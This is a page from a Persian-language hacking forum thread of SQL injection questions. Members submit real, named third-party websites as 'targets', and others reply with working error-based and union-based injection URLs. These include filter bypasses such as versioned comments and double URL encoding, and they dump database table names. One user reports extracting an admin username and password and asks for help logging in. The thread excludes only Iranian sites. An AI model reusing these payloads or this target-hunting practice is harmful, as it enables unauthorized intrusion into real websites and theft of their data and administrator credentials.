انجمن گروه آشیانه - آموزش امنیت و راه های مقابله با هک
دوره آموزشی آشیانه آدرس رسمی کانال تلگرام گروه آشیانه
انجمن آموزشی لینوکس سیسکو ویپ استریسک الستیکس میکروتیک آشیانه هاست ارائه دهنده میزبانی وب امن؛ سرورهای اختصاصی و مجازی
صفحه 1550 از 1550 نخستنخست ... 550 1050 1450 1500 15401541154215431544154515461547154815491550
نمایش نتایج: از 23,236 به 23,244 از 23244

موضوع: [تاپیک] جامع سوالات SQL Injection

  1. Top | #23236

    تاریخ عضویت
    May 2010
    میانگین پست در روز
    0.87
    نوشته ها
    2,268
    تشکر
    30,035
    تشکر شده 26,808 بار در 2,336 ارسال
    ميزان امتياز: 84099Array
    نقل قول نوشته اصلی توسط AMIR MONTALVO نمایش پست ها
    دوستان بایپیس این ممنون میشم

    و همچنین این تارگت که فکر کنم با نقطه ثبل tables حساسه
    درود عرض ادب .

    به این دلیل ک هنوز دوستان فرصت نکردن سوال شمارو بخونن
    من کمی راهنمایی میکنم
    سایت اول که هم کالمن 15 و هم 1 رو نمایش میده که به نظر مشکوک به مولتی query هست .
    که دوستان انجام میدن و الان فرصت نمیشه .

    ولی با ارور بیس اگر عجله دارید سریع میتونید پیش برید : version :

    کد:
    +or+1+GROUP+BY+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1
    ----------

    تارگت دوم هم شددیا به نفطه حساس هست انگار // و هر جای سایت نقطه بزارید 404 میشه .
    سخت نیست این تارگت رو از get بزنیم که البته با اموزش های تاپیک بنده و سوالات قبل کمی وقت بزارید میشه .

    به دنبال اینجکت در cookies یا مقدار های post شده باشید هم نتیجه میده .

    ویرایش توسط H_SQLI.EMpiRe : دیروز در ساعت 11:00 PM دلیل: اضافه کردن لینک
    ﮔﺎﻫﯽ ﻟﺐ ﻫﺎﯼ ﺧﻨﺪﺍﻥ ﺑﯿﺸﺘﺮ ﺍﺯ ﭼﺸﻢ ﻫﺎﯼ ﮔﺮﯾﺎﻥﺩﺭﺩ” ﻣﯽ ﮐﺸﻨﺪ




    به دلیل دیر جواب دادن به پیام های خصوصی عذر خواهی میکنم دوستان
    لطفا عزیزانی که تارگت ارسال میکنند برای بررسی با عنوان زیر ارسال کنند.(تارگت ایرانی ممنوع)
    [Target]

  2. 7 کاربر مقابل از H_SQLI.EMpiRe عزیز به خاطر این پست مفید تشکر کرده اند.


  3.  

  4. Top | #23237

    تاریخ عضویت
    Aug 2012
    میانگین پست در روز
    0.72
    محل سکونت
    iran
    نوشته ها
    1,316
    تشکر
    4,592
    تشکر شده 7,072 بار در 1,057 ارسال
    ميزان امتياز: 31215Array
    نقل قول نوشته اصلی توسط AMIR MONTALVO نمایش پست ها
    دوستان بایپیس این ممنون میشم

    و همچنین این تارگت که فکر کنم با نقطه ثبل tables حساسه


    سلام دوستم
    تارگت اولتو برات به روش ارور بیس از یه پارامتر دیگه بایپس کردم :

    تیبل ها :

    کد PHP:
    http://www.circlewest.net/education-detail.php?pID=54+and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(table_name%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) 

    ----
    ببخشید همزمان شد
    ویرایش توسط HackFans : 07-24-2017 در ساعت 02:09 AM
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]


  5. 7 کاربر مقابل از HackFans عزیز به خاطر این پست مفید تشکر کرده اند.


  6. Top | #23238

    تاریخ عضویت
    Jun 2017
    میانگین پست در روز
    0.09
    نوشته ها
    5
    تشکر
    0
    تشکر شده 0 بار در 0 ارسال
    ميزان امتياز: 0Array
    مرسی از جواب دوستان
    بازم با یک تارگت دیگه گیر کردم نمیدونم مشکل کجاس
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]' /*!50000UNION*/ SELECT 1,/*!12345GroUp_coNcAt(table_name)*/,3,4,5,6,7,8,9,10,11,12,13 /*!12345from*/ /*!12345information_schema*/.tables /*!12345where*/ table_schema=database()--+

  7. Top | #23239

    تاریخ عضویت
    Aug 2012
    میانگین پست در روز
    0.72
    محل سکونت
    iran
    نوشته ها
    1,316
    تشکر
    4,592
    تشکر شده 7,072 بار در 1,057 ارسال
    ميزان امتياز: 31215Array
    بازم سلام دوستم

    دوستان بایپیس این ممنون میشم

    و همچنین این تارگت که فکر کنم با نقطه ثبل tables حساسه
    تارگت قبلی پست قبلیت که اقا هومن گفتن به (.) حساسه
    رو میتونی از یه پارامتر دیگه بایپس کنی (اینم خودش یه روشه )
    البته به روش ارور بیس

    بفرمایید :

    کد PHP:
    http://www.kortmaninc.com/services6+and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(table_name%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)-- 



    نقل قول نوشته اصلی توسط AMIR MONTALVO نمایش پست ها
    مرسی از جواب دوستان
    بازم با یک تارگت دیگه گیر کردم نمیدونم مشکل کجاس
    بفرمایید :

    کد PHP:
    http://www.parliamentnewsbd.com/detail.php?news_detail=524%27%20and%20@x:=(select%20/*!50000GrouP_CONcAt(/*!50000table_name)*/%20from%20/*!50000information_Schema*/.tables/*!50000Where*/table_schema=database/**/())%20/*!50000union*/%20select%201,2,3,unhex(hex(@x)),5,6,7,8,9,10,11,12,13%20--+ 
    دوستم تیبل ها رو نشون میده اما شما باید
    سورس صفحه رو چک کنید


    <img src="admin-web/news_image/慤浩測慤癥牴楳敭敮琬景潴敲彤整慩 湥睳Ɱ敷獟捡瑥杯特Ɒ桯瑯彧慬汥特ⱶ楤敯" width="728" border="0" height="400">
    ویرایش توسط HackFans : 07-24-2017 در ساعت 03:19 AM
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]


  8. 9 کاربر مقابل از HackFans عزیز به خاطر این پست مفید تشکر کرده اند.


  9. Top | #23240

    تاریخ عضویت
    Jun 2017
    میانگین پست در روز
    0.09
    نوشته ها
    5
    تشکر
    0
    تشکر شده 0 بار در 0 ارسال
    ميزان امتياز: 0Array
    خیلی ممنون ولی تارگت دوم هیچ نیبلی رو نشون نمیده منظورم از بایپیس این بود ک تیبل هارو نشون بده

  10. Top | #23241

    تاریخ عضویت
    Nov 2014
    میانگین پست در روز
    0.41
    محل سکونت
    in the moments
    نوشته ها
    394
    تشکر
    2,201
    تشکر شده 3,276 بار در 333 ارسال
    ميزان امتياز: 27231Array

    Heart

    نقل قول نوشته اصلی توسط AMIR MONTALVO نمایش پست ها
    دوستان بایپیس این ممنون میشم

    و همچنین این تارگت که فکر کنم با نقطه ثبل tables حساسه
    سلام...

    تشکر از هومن و دوستمون برای اینجکت ....
    اون تارگتی که به نقطه حساسه نمونش قبلا بوده ...
    این دفعه نمیگم خودتون پیداش کنید چون خودم گشتم پیداش کردم [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    همین که گفتید نقطه رفتم اونجا ...

    این تارگتا با double url encode بایپس میشن..
    کد:
    http://www.kortmaninc.com/experience13 and 0=1 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema%252etables-- -
    دقیقا همون تارگتی هم که لینک پستشو دادم به این شکل از directory باگ داشت...و باز هم نقطه ...
    و توضیحات هم مثل همون لینک
    کد:
    dot . -> %2e -> %252e
    و دوم اینکه به , کاما حساس نبود ... به هر حال اگر خواستید با join تیبل بگیرید information_sche رو باید در همون سلکت استفاده کنید (قوانین ساب کوئری ها) [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    کد:
    http://www.kortmaninc.com/experience13 and 0=1 union select * from (select 1)a join (select 2)b join (select group_concat(table_name) from information_schema+%252e+tables)c join (select 4)d join (select 5)f join (select 6)g join (select 7)h join (select 8)j -- -
    موفق باشید
    خلاقیت پایانی ندارد !
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    NEVER sey NEVER

  11. 15 کاربر مقابل از r3dcat عزیز به خاطر این پست مفید تشکر کرده اند.


  12. Top | #23242

    تاریخ عضویت
    Sep 2012
    میانگین پست در روز
    0.04
    نوشته ها
    65
    تشکر
    727
    تشکر شده 37 بار در 17 ارسال
    ميزان امتياز: 0Array
    سلام دوستان ممنون ازاین تاپیک مفیدتون من تازه دارم استفاده ازباگsqlرویادمیگیرم توباپیس هامشکل دارم الان هم یه تارگت پیداکردم لامصب هرنمونه باپیس میکنم تاتیبل اسیب پذیرپیداکنم نمیشه اصلاعقده ای شدم نصبت بهشممنون میشم باپیسش کنیدلینکو ممنون
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

  13. Top | #23243

    تاریخ عضویت
    Aug 2013
    میانگین پست در روز
    0.21
    نوشته ها
    307
    تشکر
    1,921
    تشکر شده 198 بار در 99 ارسال
    ميزان امتياز: 192Array
    نقل قول نوشته اصلی توسط Abdo5162 نمایش پست ها
    سلام دوستان ممنون ازاین تاپیک مفیدتون من تازه دارم استفاده ازباگsqlرویادمیگیرم توباپیس هامشکل دارم الان هم یه تارگت پیداکردم لامصب هرنمونه باپیس میکنم تاتیبل اسیب پذیرپیداکنم نمیشه اصلاعقده ای شدم نصبت بهشممنون میشم باپیسش کنیدلینکو ممنون
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    سلام دوست عزیز

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

  14. کاربر مقابل از silyutls عزیز به خاطر این پست مفید تشکر کرده است:


  15. Top | #23244

    تاریخ عضویت
    Sep 2012
    میانگین پست در روز
    0.04
    نوشته ها
    65
    تشکر
    727
    تشکر شده 37 بار در 17 ارسال
    ميزان امتياز: 0Array
    نقل قول نوشته اصلی توسط silyutls نمایش پست ها
    سلام دوست عزیز

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    ممنون ازپاسخت رفیق فقط من الان یوز وپسورد ادمین رو بیرون کشیدم ادمین پیج هم پیداکردم ولی نمیتونم واردشم ارورمیده یوزرنیم یا پسورد اشتباهه باید چیکارکنم مشکل ازکجاس ممنون میشم اساتید دیگه هم نظرشون روبگن
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

صفحه 1550 از 1550 نخستنخست ... 55010501450150015401541154215431544154515461547154815491550

موضوعات مشابه

  1. تاپیک سوالات نرم افزار موبایل
    توسط mohammadf255 در انجمن نرم افزار موبایل
    پاسخ: 111
    آخرين نوشته: 04-04-2017, 12:14 AM
  2. تاپیک جامع آموزش تزریق به بانک اطلاعاتی SQL Injection
    توسط Pythagoras در انجمن تست نفوذ و امنیت دیتابیس ها
    پاسخ: 3
    آخرين نوشته: 05-14-2014, 06:24 PM
  3. [تاپیک] جامع سوالات SQL Injection
    توسط ERroR در انجمن سوال و جواب های عمومی کامپیوتر
    پاسخ: 1186
    آخرين نوشته: 03-11-2010, 02:15 AM

کلمات کلیدی این موضوع

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •  
شبکه های اجتماعی
تلفن های شرکت
شماره های تماس: 6-88749724-021
درباره گروه امنیتی آشیانه

گروه امنیتی آشیانه گروهی شخصی و کاملا مستقل بوده و به تائید سایت معتبر Alexa اولین و بزرگترین سایت امنیت شبکه در ایران است. همچنین کلیه حقوق اطلاعات و مقالات در این سایت متعلق به گروه امنیتی آشیانه بوده و هرگونه نسخه برداری از آن بدون ذکر منبع پیگرد قانونی خواهد داشت.